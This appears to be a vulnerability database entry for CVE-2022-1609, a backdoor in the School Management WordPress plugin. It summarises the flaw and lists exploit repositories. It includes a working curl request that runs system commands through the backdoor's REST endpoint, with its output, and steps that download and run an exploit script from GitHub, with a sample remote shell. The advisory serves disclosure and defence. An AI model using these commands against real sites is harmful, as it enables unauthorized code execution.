CVE-2022-1609

Published: 16/01/2024 Updated: 22/01/2024
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

The School Management WordPress plugin prior to 9.9.7 contains an obfuscated backdoor injected into its license-checking code. The backdoor registers a REST API handler, allowing an unauthenticated malicious user to execute arbitrary PHP code on the site.

Vulnerable Product

weblizar school management

Github Repositories

CVE-2022-1609 WordPress Weblizar backdoor

CVE-2022-1609
CVE-2022-1609 WordPress Weblizar backdoor

curl -s -d 'blowfish=1' -d "blowf=system('id');" 'localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Remote Code Execution vulnerability on WordPress plugin School Management

WP-school-management-RCE
CVE-2022-1609: Remote Code Execution vulnerability on WordPress plugin School Management
Reference: Wpscan

Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.

cve-2022-1609-exploit
Exploit for CVE-2022-1609 WordPress Weblizar Backdoor

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor

CVE-2022-1609
Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor

How to install ?

wget raw.githubusercontent.com/0xSojalSec/CVE-2022-1609/main/exploit.sh
chmod +x exploit.sh
./exploit.sh

How to use it ?

GH0ST_3exP10it$ ./exploit.sh 127.0.0.1:8080
[+] Targeting 127.0.0.1:8080
$ id
uid=33(www-data) gid=33(www-dat